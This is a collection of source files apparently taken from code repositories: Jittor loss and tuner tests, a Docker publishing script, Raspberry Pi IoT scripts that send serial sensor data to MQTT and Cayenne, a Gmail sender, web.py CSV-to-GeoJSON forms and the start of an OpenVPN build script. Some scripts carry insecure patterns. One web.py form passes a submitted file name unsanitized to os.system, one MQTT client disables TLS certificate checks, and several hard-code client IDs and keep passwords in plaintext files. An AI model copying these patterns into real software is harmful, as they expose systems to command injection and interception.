r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),ignore_index=C//2)
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),weight=torch.tensor(weight),ignore_index=C//2)
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),weight=jt.array(weight),ignore_index=C//2)
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
def test_cross_entropy_ignore_index(self):
ignore_index = np.random.randint(0, 10)
jt_loss = jnn.CrossEntropyLoss(ignore_index=ignore_index)
tc_loss = tnn.CrossEntropyLoss(ignore_index=ignore_index)
output = np.random.rand(100, 10).astype(np.float32)
target = np.random.randint(10, size=(100))
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_cross_entropy_weight(self):
weight = np.random.rand(10).astype('float32')
jt_loss = jnn.CrossEntropyLoss(weight=jt.array(weight))
tc_loss = tnn.CrossEntropyLoss(weight=torch.from_numpy(weight))
output = np.random.rand(100, 10).astype(np.float32)
target = np.random.randint(10, size=(100))
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_cross_entropy_weight_ignore(self):
weight = np.random.rand(4).astype('float32')
jt_loss = jnn.CrossEntropyLoss(weight=jt.array(weight), ignore_index=1)
tc_loss = tnn.CrossEntropyLoss(weight=torch.from_numpy(weight), ignore_index=1)
output = np.random.rand(3, 4, 2,2).astype(np.float32)
target = np.random.randint(4, size=(3, 2,2))
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
np.testing.assert_allclose(jt_y.numpy(), tc_y.numpy())
def test_bce_loss(self):
jt_loss=jnn.BCELoss()
tc_loss=tnn.BCELoss()
jt_sig = jnn.Sigmoid()
tc_sig = tnn.Sigmoid()
output=np.random.randn(100).astype(np.float32)
target=np.random.randint(2, size=(100)).astype(np.float32)
jt_y=jt_loss(jt_sig(jt.array(output)), jt.array(target))
tc_y=tc_loss(tc_sig(torch.from_numpy(output)), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
weight=np.random.randn(100).astype(np.float32)
jt_loss=jnn.BCELoss(weight=jt.array(weight), size_average=False)
tc_loss=tnn.BCELoss(weight=torch.Tensor(weight), size_average=False)
jt_y=jt_loss(jt_sig(jt.array(output)), jt.array(target))
tc_y=tc_loss(tc_sig(torch.from_numpy(output)), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_bce_with_logits_loss(self):
jt_loss=jnn.BCEWithLogitsLoss()
tc_loss=tnn.BCEWithLogitsLoss()
output=np.random.randn(100).astype(np.float32)
target=np.random.randint(2, size=(100)).astype(np.float32)
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
if __name__ == "__main__":
unittest.main()
```
#### File: jittor/test/test_matmul_tuner.py
```python
import sys
import os
import jittor as jt
import unittest
import time
import numpy as np
from .test_reorder_tuner import simple_parser
from .test_log import find_log_with_re
class TestMatmulTuner(unittest.TestCase):
def test_matmul_tuner(self):
n,m,k = 10,10,10
a = jt.random([n,m])
b = jt.random([m,k])
with jt.log_capture_scope(
log_v=0, log_vprefix="tuner_manager=100,var_relay=100",
compile_options={"test_matmul_tuner":1}
) as rawlogs:
c = a.broadcast([n,m,k], [2]) * b.broadcast([n,m,k], [0])
c = c.sum(1)
jc = c.numpy()
nc = np.matmul(a.numpy(), b.numpy())
assert (np.abs(jc-nc)<1e-3).all()
logs = find_log_with_re(rawlogs,
"Run tuner matmul: confidence\\((.*)\\) candidates\\((.*)\\)$")
assert len(logs) == 1
assert logs[0][0] == "20", "confidence of reorder should be 20"
candidates = simple_parser(logs[0][1])
assert candidates == {"relay0":[1,0]}, candidates
logs = find_log_with_re(rawlogs, r"get_relay_src([\s\S]*)")
assert len(logs)==1
assert "@relay_op" in logs[0]
if __name__ == "__main__":
unittest.main()
```
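The test above checks that the tuner recognizes matmul written as a broadcast followed by a reduction; the same pattern can be written standalone (a sketch mirroring the test):
```python
import jittor as jt
import numpy as np

n, m, k = 10, 10, 10
a = jt.random([n, m])
b = jt.random([m, k])
# Broadcast a along dim 2 and b along dim 0 to [n, m, k], multiply, then
# reduce over the shared dimension m -- exactly a matrix product.
c = (a.broadcast([n, m, k], [2]) * b.broadcast([n, m, k], [0])).sum(1)
assert np.allclose(c.numpy(), np.matmul(a.numpy(), b.numpy()), atol=1e-3)
```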
#### File: jittor/test/test_superglue.py
```python
import unittest
import jittor as jt
import numpy as np
import os
from jittor.test.misc import superglue
from jittor.test.misc.superglue import SuperGlue
import time
@jt.flag_scope(use_cuda=1)
def main():
global superglue
superglue.split_size = int(os.environ.get("split_size", "12"))
# superglue.split_size = 1000000
batch = 30
num = 2000
dim = 128
# jt.display_memory_info()
# os.system("nvidia-smi")
# breakpoint()
with jt.no_grad():
config = {
'superglue': {
'sinkhorn_iterations': 25,
'match_threshold': 0.01,
'keypoint_position_dim': 2,
'descriptor_dim': dim,
'use_dual_softmax': True,
'GNN_layers': ['self', 'cross'] * 9,
}
}
superglue = SuperGlue(config.get('superglue', {}))
superglue.eval()
data = {
'keypoints0': jt.rand((batch, num, 2), dtype=jt.float),
'keypoints1': jt.rand((batch, num, 2), dtype=jt.float),
'shape0': jt.rand((batch, 2), dtype=jt.float),
'shape1': jt.rand((batch, 2), dtype=jt.float),
'descriptors0': jt.rand((batch, dim, num), dtype=jt.float),
'descriptors1': jt.rand((batch, dim, num), dtype=jt.float),
'scores0': jt.rand((batch, num), dtype=jt.float),
'scores1': jt.rand((batch, num), dtype=jt.float),
'all_matches': jt.randint(0, num, (batch, num, 2), dtype=jt.int),
'return_match': False,
# 'match_num': match_num
}
use_fp16 = int(os.environ.get("use_fp16", "0"))
if use_fp16:
jt.flags.amp_reg = 2
for k,v in data.items():
if isinstance(v, jt.Var) and v.dtype == "float32":
v.assign(v.float16())
for v in superglue.parameters():
if v.dtype == "float32":
v.assign(v.float16())
jt.sync_all(True)
import pickle
jt.sync_all(True)
for x in range(5):
print(x)
jt.gc()
x = superglue(data)['loss']
x.sync()
jt.display_memory_info()
# os.system("nvidia-smi")
# breakpoint()
# print(data)
# print(x)
# with open("/tmp/record.pkl", "wb") as f:
# pickle.dump([data, x], f, pickle.HIGHEST_PROTOCOL)
# with jt.flag_scope(trace_py_var=3, profile_memory_enable=1):
# x = superglue(data)['loss']
# x.sync()
# jt.get_max_memory_treemap()
# exit(0)
jt.sync_all(True)
time0 = time.time()
jt.flags.profiler_enable = int(os.environ.get("profiler", "0"))
for x in range(20):
print(x)
# jt.display_memory_info()
x = superglue(data)['loss']
x.sync()
# print(x)
jt.sync_all(True)
time1 = time.time()
print("avg time:", (time1 - time0) / 20)
return (time1 - time0) / 20
class TestSuperglue(unittest.TestCase):
def test(self):
if not jt.has_cuda: return
t1 = main()
os.environ["use_fp16"] = "1"
t2 = main()
os.environ["use_fp16"] = "0"
assert t1*0.55 > t2
if __name__ == "__main__":
unittest.main()
```
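The float16 conversion scattered through the benchmark above can be factored into a small helper; a sketch distilled from the test (the `to_fp16` name is ours, and `amp_reg = 2` mirrors the flag the test sets before converting):
```python
import jittor as jt

def to_fp16(module, data):
    """Cast float32 parameters and float32 Var inputs to float16 in place."""
    jt.flags.amp_reg = 2
    for v in module.parameters():
        if v.dtype == "float32":
            v.assign(v.float16())
    for k, v in data.items():
        if isinstance(v, jt.Var) and v.dtype == "float32":
            v.assign(v.float16())
    return data
```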
#### File: jittor/utils/publish.py
```python
import os
def run_cmd(cmd):
print("[run cmd]", cmd)
assert os.system(cmd) == 0
def upload_file(path):
run_cmd(f"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/")
def docker_task(name, build_cmd):
run_cmd(build_cmd)
run_cmd(f"sudo docker push {name}")
bname = os.path.basename(name)
run_cmd(f"sudo docker save {name}:latest -o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz")
upload_file(f"/tmp/{bname}.tgz")
docker_task(
"jittor/jittor-cuda-11-1",
"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host"
)
docker_task(
"jittor/jittor",
"sudo docker build --tag jittor/jittor:latest . --network host"
)
docker_task(
"jittor/jittor-cuda",
"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host"
)
docker_task(
"jittor/jittor-cuda-10-1",
"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host"
)
run_cmd("ssh jittor-web Documents/jittor-blog.git/hooks/post-update")
```
#### File: python/jittor_utils/translator.py
```python
import os, json
from pathlib import Path
dirname = os.path.dirname(__file__)
jittor_root = os.path.join(dirname, "..", "..")
print(jittor_root)
all_src_md = []
for r, _, f in os.walk(jittor_root):
for fname in f:
if not fname.endswith(".src.md"): continue
all_src_md.append(os.path.realpath(os.path.join(r, fname)))
def check_is_en(src):
en_cnt = 0
for c in src: en_cnt += str.isascii(c)
return en_cnt == len(src)
def check_is_both(src):
return len(src) < 2
for mdname in all_src_md:
print(mdname)
with open(mdname, "r", encoding='utf8') as f:
src = f.read()
src = src.split("```")
en_src = []
cn_src = []
for i, s in enumerate(src):
if i%2==1:
en_src.append(s)
cn_src.append(s)
else:
en_s = []
cn_s = []
for line in s.split('\n'):
if check_is_both(line):
en_s.append(line)
cn_s.append(line)
elif check_is_en(line):
en_s.append(line)
else:
cn_s.append(line)
en_src.append("\n".join(en_s))
cn_src.append("\n".join(cn_s))
en_src = "```".join(en_src)
cn_src = "```".join(cn_src)
with open(mdname.replace(".src.md", ".md"), 'w', encoding='utf8') as f:
f.write(en_src)
with open(mdname.replace(".src.md", ".cn.md"), 'w', encoding='utf8') as f:
f.write(cn_src)
``` |
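For reference, the splitter above treats very short lines as shared and pure-ASCII lines as English; a quick self-contained sketch of that behaviour (the two helpers are restated so the snippet runs on its own; `str.isascii` needs Python 3.7+):
```python
def check_is_en(src):
    return sum(str.isascii(c) for c in src) == len(src)

def check_is_both(src):
    return len(src) < 2

assert check_is_both("")             # blank/very short lines go to both outputs
assert check_is_en("plain English")  # ASCII-only lines go to the .md file
assert not check_is_en("中文注释")    # lines with non-ASCII go to the .cn.md file
```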
{
"source": "JittoThomas/IOT",
"score": 3
} |
#### File: IOT/MQTTupload/DORJI_Serial_to_MarkerAPI.py
```python
#this imports the libraries needed
import serial, time
#import needed modules
import urllib
import urllib2
#This sets up the serial port ttyAMA0 GPIO. baud rate is the bits per second.
port = serial.Serial("/dev/ttyAMA0", baudrate=2400)
while True:
#read buffer until cr/lf
rcv = port.readline()
rcv = rcv.rstrip("\r\n")
attributes = rcv.split(",")
#for attribute in attributes:
#print(attribute)
param, key = attributes[0].split("=",1)
param, node = attributes[1].split("=",1)
param, channel = attributes[2].split("=",1)
param, data = attributes[3].split("=",1)
print(key, node, channel, data)
# Custom Functions
def send():
#API URL
url = 'http://203.118.129.73:8082/api/marker'
#place marker attributes in a dictionary
dataToSend = {
'key' : key,
'node' : node,
'channel' : channel,
'latitude' : '',
'longitude' : '',
'elevation' : '',
'data' : data
}
data_encoded = urllib.urlencode(dataToSend)
req = urllib2.Request(url, data_encoded)
response = urllib2.urlopen(req)
print response.read()
send() # excute send function
```
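The script above is Python 2 (`urllib2` and the `print` statement). A rough Python 3 equivalent of the same POST, kept only as a sketch (URL and field names are copied from the script, not verified against the Marker API):
```python
import urllib.parse
import urllib.request

def send(key, node, channel, data):
    url = 'http://203.118.129.73:8082/api/marker'
    payload = urllib.parse.urlencode({
        'key': key, 'node': node, 'channel': channel,
        'latitude': '', 'longitude': '', 'elevation': '',
        'data': data,
    }).encode('utf-8')
    # Passing data makes this a POST request.
    with urllib.request.urlopen(urllib.request.Request(url, payload)) as resp:
        print(resp.read())
```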
#### File: IOT/MQTTupload/MQTTest.py
```python
import cayenne.client
import time
# Cayenne authentication info. This should be obtained from the Cayenne Dashboard.
MQTT_USERNAME = "a6f9ca60-aaa6-11e6-839f-8bfd46afe676"
MQTT_PASSWORD = "<PASSWORD>"
MQTT_CLIENT_ID = "377428e0-526a-11e7-aaa7-cf0a7ad22796"
# The callback for when a message is received from Cayenne.
def on_message(message):
print("message received: " + str(message))
# If there is an error processing the message return an error string, otherwise return nothing.
client = cayenne.client.CayenneMQTTClient()
client.on_message = on_message
client.begin(MQTT_USERNAME, MQTT_PASSWORD, MQTT_CLIENT_ID)
i=0
timestamp = 0
while True:
client.loop()
if (time.time() > timestamp + 30):
client.celsiusWrite(1, i+10)
client.luxWrite(2, i*10+20)
client.hectoPascalWrite(3, i+900)
timestamp = time.time()
i = i+2
```
#### File: IOT/MQTTupload/MQTT_to_print.py
```python
import csv, os, requests
import xml.etree.cElementTree as ET
import datetime
#import pandas as pd
#import plotly.tools
#from plotly.offline import download_plotlyjs, init_notebook_mode, iplot
#init_notebook_mode()
import time, glob, paho.mqtt.client as mqtt
broker_file = '/home/administrator/MQTT_broker'
interval = 5
# Read each line of broker_file, and remove the <CR><LF> at the end of the line
broker_deets = open(broker_file,'r')
line = broker_deets.readline() # Read the comment line
line = broker_deets.readline() # IP Address or hostname of MQTT broker
broker_address =line.rstrip("\r\n")
line = broker_deets.readline() # Topic Name to use for Value One
broker_topic1 =line.rstrip("\r\n")
line = broker_deets.readline() # Topic Name to use for Value Two
broker_topic2 =line.rstrip("\r\n")
line = broker_deets.readline() # Broker username
broker_username =line.rstrip("\r\n")
line = broker_deets.readline() # Broker password VERY INSECURE!
broker_password =line.rstrip("\r\n")
broker_deets.close()
# print( broker_address, broker_topic1, broker_topic2, broker_username, broker_password)
def on_message(client, userdata, message):
print(time.ctime(time.time()))
print("message received " ,message.payload)
    txt_this = open("txt_this.txt", "a+")
    txt_this.write("ok")
    txt_this.write('\n')
    txt_this.write(str(message.payload))  # file objects have no append(); write the payload instead
    txt_this.write('\n')
    txt_this.close()
# print("message qos=",message.qos)
# print("message retain flag=",message.retain)
# Program starts here
# Connect to the broker
broker = mqtt.Client()
broker.username_pw_set(broker_username, broker_password)
broker.connect(broker_address)
broker.subscribe([(broker_topic1,1),(broker_topic2,1)])
broker.on_message=on_message #attach function to callback
broker.loop_start() #start the loop
Run_flag=True
while Run_flag :
try: # catch a <CTRL C>
time.sleep(1)
except KeyboardInterrupt:
Run_flag=False # Stop the loop
print('\n','Exiting app') # Send a cheery message
time.sleep(4) # Four seconds to allow sending to finish
broker.disconnect() # Disconnect from broker
broker.loop_stop() # Stop looking for messages
# ------ convert -----
csv_this = open('csv_file_this.csv','w')
#txtfile = open('/home/administrator/MQTT_broker')
#time.ctime(time.time())
#txt_data =message.payload
#message.topic
#txtfile.write('txt_data.txt\n')
```
#### File: IOT/MQTTupload/serial_mosquitto.py
```python
import time, serial, paho.mqtt.client as paho
#print( 'Opening MQTT3:',time.ctime(time.time()) )
# mosquitto settings
#broker="home.rata.co.nz"
broker="192.168.80.222"
#broker="sensor-base"
port=8884
qos=1
topic="sensor/temp"
# How often shall we write values to the Mosquitto broker? (Seconds + 1)
interval = 10
# Default location of serial port on Pi models 1 and 2
SERIAL_PORT = "/dev/ttyAMA0"
# Set some variables now, in case the error capture below wants to
# print them before the loop is first run
channel = -1
node = -1
data = -1
#This sets up the serial port specified above. baud rate is the bits per second.
sport = serial.Serial(SERIAL_PORT, baudrate=2400, timeout=1)
def on_publish(client, userdata, mid):
# print("pub ack "+ str(mid))
client.mid_value=mid
client.puback_flag=True
# Wait for publish to be acknowledged
def wait_for(client,msgType,period=0.25,wait_time=40):
#def wait_for(client,msgType,period=0.25,wait_time=40,running_loop=False):
# client.running_loop=running_loop #if using external loop
wcount=0
while True:
#print("waiting"+ msgType)
if msgType=="PUBACK":
if client.on_publish:
if client.puback_flag:
return True
time.sleep(period)
#print("loop flag ",client.running_loop)
wcount+=1
if wcount>wait_time:
print("return from wait loop taken too long")
return False
return True
def c_publish(client,topic,out_message,qos):
res,mid=client.publish(topic,out_message,qos)#publish
if res==0: #publish attempted ok
# if wait_for(client,"PUBACK"):
# if wait_for(client,"PUBACK",running_loop=True):
time.sleep(4) # wait for the publish to be acknowledged
if mid==client.mid_value:
# print("match mid ",str(mid))
client.puback_flag=False #reset flag
else:
raise SystemExit("not got correct puback mid so quitting")
# else:
# raise SystemExit("not got puback so quitting")
#####
# Everything defined - so now we can do things
#####
client= paho.Client(topic.replace('/','-'))
client.tls_set('/home/mosquitto/certs/m2mqtt_srv.crt')
client.tls_insecure_set(True)
client.on_publish=on_publish
client.puback_flag=False #use flag in publish ack
client.mid_value=None
#print("connecting to broker ",broker)
client.connect(broker,port)#connect
client.loop_start() #start loop to process received messages
#print( 'Connected:',time.ctime(time.time()) )
# Initialise timing variables
timedata = time.time()
Run_flag=True
while Run_flag:
try: # add an exception capture once everything is working
rcv = sport.readline() #read buffer until cr/lf
rcv=rcv.decode("utf-8") #buffer read is 'bytes' in Python 3.x
#this makes it 'str'
rcv = rcv.rstrip("\r\n")
# print("Read: >" + rcv + "<", rcv.count(','))
if rcv.count(',') > 1: # Checksum check should be added here
out_message=str(int(time.time()))+":"+topic+rcv
c_publish(client,topic,out_message,qos)
# print( 'Waiting:',time.ctime(time.time()) )
while (time.time() < timedata + interval):
time.sleep(1)
timedata = time.time()
except KeyboardInterrupt:
Run_flag=False
time.sleep(4)
client.disconnect() #disconnect
client.loop_stop() #stop loop
```
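The hand-rolled `puback_flag`/`wait_for` machinery above can be compared with paho's built-in acknowledgement handle; a minimal sketch assuming paho-mqtt 1.x (as used by the script), without TLS and with placeholder broker, port and topic:
```python
import paho.mqtt.client as mqtt

client = mqtt.Client("sensor-temp-demo")
client.connect("192.168.80.222", 1883)
client.loop_start()                  # network loop must run for the ack to arrive

# publish() returns an MQTTMessageInfo; wait_for_publish() blocks until the
# broker acknowledges the message (the PUBACK, for QoS 1).
info = client.publish("sensor/temp", "21.5", qos=1)
info.wait_for_publish()

client.loop_stop()
client.disconnect()
```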
#### File: IOT/MQTTupload/Serial_multi_MQTT.py
```python
import cayenne.client, time, serial
# import random
# Cayenne authentication info. This should be obtained from the Cayenne Dashboard.
# Random Thing on Steve's Desktop
MQTT_USERNAME = "eb68ba50-7c9<PASSWORD>"
MQTT_PASSWORD = "<PASSWORD>"
MQTT_CLIENT_ID = "3677e5b0-7fa8-11e7-a5d9-9de9b49680ec"
# Steve Temperature on Andrew's desktop
# MQTT_USERNAME = "a6f9ca60-aaa6-<PASSWORD>"
# MQTT_PASSWORD = "<PASSWORD>"
# MQTT_CLIENT_ID = "53a9e530-83b2-11e7-a9f6-4b991f8cbdfd"
# Other settings that seem to be embedded in Cayenne's libraries
# MQTT_URL = "mqtt.mydevices.com"
# MQTT_PORT = "1883"
# Default location of serial port on Pi models 1 and 2
SERIAL_PORT = "/dev/ttyAMA0"
# How often shall we write values to Cayenne? (Seconds + 1)
interval = 30
# Sort out symbols
# http://www.utf8-chartable.de/unicode-utf8-table.pl?utf8=0x&unicodeinhtml=hex
POWER3 = u'\xb3'
DEG = u'\xb0' # utf code for degree
# Put our sensor metadata into a dictionary of lists
sensor_short = 0
sensor_fullname = 1
sensor_unit = 2
sensor_unitfull = 3
sensor_nodes = {
'A' : [ 'Temp', 'Temperature', DEG, 'degrees celcius' ],
'B' : [ 'Humid', 'Humidity', '%', '%' ],
'C' : [ 'Rain', 'Rainfall', 'mm', 'millimetres' ],
'D' : [ 'BaroP', 'Barametric Pressure', 'hPa', 'hectopascal' ],
'E' : [ 'Capacitance', 'Capacitance', 'F', 'farad' ],
'F' : [ 'Wght', 'Weight', 'g', 'grammes' ],
'G' : [ 'Light', 'Light', 'lx', 'lux' ],
'H' : [ 'Density', 'Density (mass)', 'g/cm'+POWER3, 'grammes per cubic centimetre' ],
'I' : [ 'NodeI', 'Node I sensor data', 'I', 'Units of node I' ],
'J' : [ 'NodeJ', 'Node J sensor data', 'J', 'Units of node J' ],
}
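# Example lookup (illustrative): sensor_nodes['A'][sensor_fullname] -> 'Temperature' and
# sensor_nodes['A'][sensor_unit] -> the degree symbol, so a reading from node 'A' could be
# printed as e.g. "Current Temperature is 21.5°".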
# Set some variables now, in case the error capture below wants to
# print them before the loop is first run
channel = -1
node = -1
data = -1
#This sets up the serial port specified above. baud rate is the bits per second.
port = serial.Serial(SERIAL_PORT, baudrate=2400, timeout=1)
# The callback for when a message is received from Cayenne.
def on_message(message):
time.sleep(1)
# print("reply back, message received: " + str(message))
# If there is an error processing the message return an error string, otherwise return nothing.
print 'Starting:',time.ctime(time.time())
client = cayenne.client.CayenneMQTTClient()
client.on_message = on_message
client.begin(MQTT_USERNAME, MQTT_PASSWORD, MQTT_CLIENT_ID)
print 'Connected:',time.ctime(time.time())
timestamp = 0
while True:
# try: # add an exception capture once everything is working
rcv = port.readline() #read buffer until cr/lf
rcv = rcv.rstrip("\r\n")
print("Read: >" + rcv + "<")
if len(rcv) > 5: # Checksum check should be added here
# Channel = alpha, data2 = 0-255, checksum,
channel,node,data = rcv.split(",")
# channel,node,data,chksum = rcv.split(",")
# print("rcv: " + channel + node + data )
details = sensor_nodes.get(node)
if node == 'A':
data = int(data)/10
client.celsiusWrite(1, data)
client.loop()
# elif node == 'B':
# print 'Current', details[sensor_fullname], 'is', str(data)+details[sensor_unit]
print 'Waiting:',time.ctime(time.time())
while (time.time() < timestamp + interval):
time.sleep(1)
timestamp = time.time()
# print(timestamp)
# except ValueError:
# print("oops..."+"rcv: " + channel + node + data)
```
#### File: IOT/readsensors/gmailTest.py
```python
dataFile = '/home/pi/EmailConfig'
def send_mail(gmailUser, gmailPassword, fromAddress, recipient, message, subject ):
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
msg = MIMEMultipart()
msg['From'] = fromAddress
msg['To'] = recipient
msg['Subject'] = subject
msg.attach(MIMEText(message))
mailServer = smtplib.SMTP('smtp.gmail.com', 587)
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(gmailUser, gmailPassword)
mailServer.sendmail(gmailUser, recipient, msg.as_string())
mailServer.close()
fileContent = open(dataFile,'r') # Open the config file for reading
comment = fileContent.readline() # First line is ignored
gmailUser = fileContent.readline() # Gmail User Name to use
gmailPassword = fileContent.readline() # Gmail password
fromAddress = fileContent.readline() # From Address
recipient = fileContent.readline() # Recipient to send message to
subject = fileContent.readline() # Subject Text
message = fileContent.readline() # Message to send
fileContent.close()
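# EmailConfig is read line-by-line in the fixed order above: comment, Gmail user, Gmail password,
# from address, recipient, subject, message. Note (observation only, not changed here): readline()
# keeps the trailing newline, so the credential values may need .strip() to authenticate cleanly.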
send_mail(gmailUser, gmailPassword, fromAddress, recipient, message, subject )
```
#### File: IOT/webpy/form2.py
```python
import web, os
from web import form
# web.config.debug = True
render = web.template.render('templates/') # your templates
urls = (
'/', 'register'
)
OutputPath='/var/www/html/OSM/temp/'
entries = os.listdir('./archive.old')
# entries = os.listdir('/home/cosste/CayMQTT')
register_form = form.Form(
form.Dropdown(name='fileName', args=entries),
# form.Checkbox('fileName', value="file" ),
form.Button("submit", type="submit", description="Select File")
)
class register:
def GET(self):
# do $:f.render() in the template
web.header('Content-Type', 'text/html')
f = register_form()
return render.register(f)
def POST(self):
web.header('Content-Type', 'text/html')
f = register_form()
if not f.validates():
return render.register(f)
else:
# do whatever is required for registration
ChosenFile=f["fileName"].value
# return ChosenFile
if (ChosenFile.endswith('.csv')) :
OutputFile = ChosenFile[:-4]+'.geojson'
OutputFile = os.path.join(OutputPath,OutputFile)
os.system('python3 csv2json.py '+ChosenFile+' '+OutputFile )
return '\r\n'+ChosenFile
if __name__ == "__main__":
app = web.application(urls, globals())
app.run()
```
#### File: IOT/webpy/form.py
```python
import web, os
from urllib import quote
from web import form
from csv2json import to_geojson
# web.config.debug = True
render = web.template.render('templates/') # your templates
urls = (
'/', 'register'
)
OutputPath ='./temp/'
InputPath ='./archive'
TargetURL ='http://students.pcsupport.ac.nz/OSM/'
ExtOut ='.geojson'
entries = os.listdir(InputPath)
# entries = os.listdir('/home/cosste/CayMQTT')
register_form = form.Form(
form.Dropdown(name='fileName', args=entries),
# form.Checkbox('fileName', value="file" ),
form.Button("submit", type="submit", description="Select File")
)
class register:
def GET(self):
# do $:f.render() in the template
web.header('Content-Type', 'text/html')
f = register_form()
return render.register(f)
def POST(self):
web.header('Content-Type', 'text/html')
f = register_form()
if not f.validates():
return render.register(f)
else:
# process the file chosen
ChosenFile=f["fileName"].value
fileName, fileExt = os.path.splitext(ChosenFile)
if 'csv' in fileExt:
OutputFile = os.path.join(OutputPath, fileName+ExtOut)
else:
OutputFile = os.path.join(OutputPath, ChosenFile+ExtOut)
ChosenFile = os.path.join(InputPath, ChosenFile)
to_geojson(ChosenFile, OutputFile)
result = '{}?{}'.format(TargetURL,OutputFile)
# return '<a href='+TargetURL+'?'+OutputFile+'> Open '+TargetURL+'?'+OutputFile+' </a>'
raise web.seeother(result)
if __name__ == "__main__":
app = web.application(urls, globals())
app.run()
```
#### File: IOT/ZIP-v0.01/Serial_to_MQTT.py
```python
import cayenne.client, datetime, time, serial
# import random
#Delay Start
#print "Time now = ", datetime.datetime.now().strftime("%H-%M-%S")
#time.sleep(60)
#print "Starting now = ", datetime.datetime.now().strftime("%H-%M-%S")
# Cayenne authentication info. This should be obtained from the Cayenne Dashboard.
MQTT_USERNAME = "6<PASSWORD>"
MQTT_PASSWORD = "<PASSWORD>"
MQTT_CLIENT_ID = "157d1d10-69dd-11e8-84d1-4d9372e87a68"
# Other settings that seem to be embedded in Cayenne's libraries
# MQTT_URL = "mqtt.mydevices.com"
# MQTT_PORT = "1883"
# Default location of serial port on Pi models 1 and 2
#SERIAL_PORT = "/dev/ttyAMA0"
# Default location of serial port on Pi models 3 and Zero
SERIAL_PORT = "/dev/ttyS0"
# How often shall we write values to Cayenne? (Seconds + 1)
interval = 5
#This sets up the serial port specified above. baudrate is bits per second; timeout is in seconds
#port = serial.Serial(SERIAL_PORT, baudrate=2400, timeout=5)
#This sets up the serial port specified above. baud rate. This WAITS for any cr/lf (new blob of data from picaxe)
port = serial.Serial(SERIAL_PORT, baudrate=2400)
# The callback for when a message is received from Cayenne.
def on_message(message):
print("def on_message reply back, message received: " + str(message))
# If there is an error processing the message return an error string, otherwise returns nothing.
client = cayenne.client.CayenneMQTTClient()
client.on_message = on_message
client.begin(MQTT_USERNAME, MQTT_PASSWORD, MQTT_CLIENT_ID)
#Predefine Data Packet objects for python prior to trying to look for them :)
node = ":01"
channel = "A"
data = 123
cs = 0
while True:
try:
rcv = port.readline() #read buffer until cr/lf
#print("Serial Readline Data = " + rcv)
rcv = rcv.rstrip("\r\n")
node,channel,data,cs = rcv.split(",")
#Test Point print("rcv.split Data = : " + node + channel + data + cs)
if cs == '0':
#if the checksum is good (cs == 0) then do the following
if channel == 'A':
data = float(data)/1
client.virtualWrite(1, data, "analog_sensor", "null")
client.loop()
if channel == 'B':
data = float(data)/1
client.virtualWrite(2, data, "analog_sensor", "null")
client.loop()
if channel == 'C':
data = float(data)/1
client.virtualWrite(3, data, "analog_sensor", "null")
client.loop()
if channel == 'D':
data = float(data)/1
client.virtualWrite(4, data, "analog_sensor", "null")
client.loop()
if channel == 'E':
data = float(data)/1
client.virtualWrite(5, data, "analog_sensor", "null")
client.loop()
if channel == 'F':
data = float(data)/1
client.virtualWrite(6, data, "analog_sensor", "null")
client.loop()
if channel == 'G':
data = float(data)/1
client.virtualWrite(7, data, "analog_sensor", "null")
client.loop()
if channel == 'H':
data = float(data)/1
client.virtualWrite(8, data, "analog_sensor", "null")
client.loop()
if channel == 'I':
data = float(data)/1
client.virtualWrite(9, data, "analog_sensor", "null")
client.loop()
if channel == 'J':
data = float(data)/1
client.virtualWrite(10, data, "analog_sensor", "null")
client.loop()
if channel == 'K':
data = float(data)/1
client.virtualWrite(11, data, "analog_sensor", "null")
client.loop()
if channel == 'L':
data = float(data)/1
client.virtualWrite(12, data, "analog_sensor", "null")
client.loop()
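# A more compact dispatch would map channels to Cayenne channel numbers
# (illustrative sketch only, not part of the original script):
# channel_map = {c: i + 1 for i, c in enumerate("ABCDEFGHIJKL")}
# if cs == '0' and channel in channel_map:
#     client.virtualWrite(channel_map[channel], float(data) / 1, "analog_sensor", "null")
#     client.loop()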
except ValueError:
#if Data Packet corrupt or malformed then...
print("Data Packet corrupt or malformed")
``` |
{
"source": "jittrfunc/PQCrypto-VPN",
"score": 2
} |
#### File: openvpn/build/build.py
```python
import os
import shutil
import subprocess
import re
import fileinput
import stat
import sys
import platform
OPENVPN_TGZ_NAME = '/tmp/openvpn-2.4.4.tar.gz'
OPENVPN_GUI_TGZ_NAME = '/tmp/openvpn-gui-11.tar.gz'
OPENVPN_REPO_DIRNAME = 'openvpn-2.4.4'
OPENVPN_INSTALL_EXE_NAME = 'openvpn-install-2.4.4-I601.exe'
OPENVPN_GUI_REPO_DIRNAME = 'openvpn-gui'
OPENVPN_LINUX_PREFIX = '/usr/local/openvpn'
SCRIPTDIR = os.path.dirname(os.path.realpath(__file__))
# Run an external command, block until it completes
def run_command(cmd):
print '***** Running command: %s' % ' '.join(map(str,cmd))
p = subprocess.Popen(cmd)
if p.wait() != 0:
raise RuntimeError('Command failed')
# Make directories, but if the directories exist, that's okay.
def makedirs(name):
try:
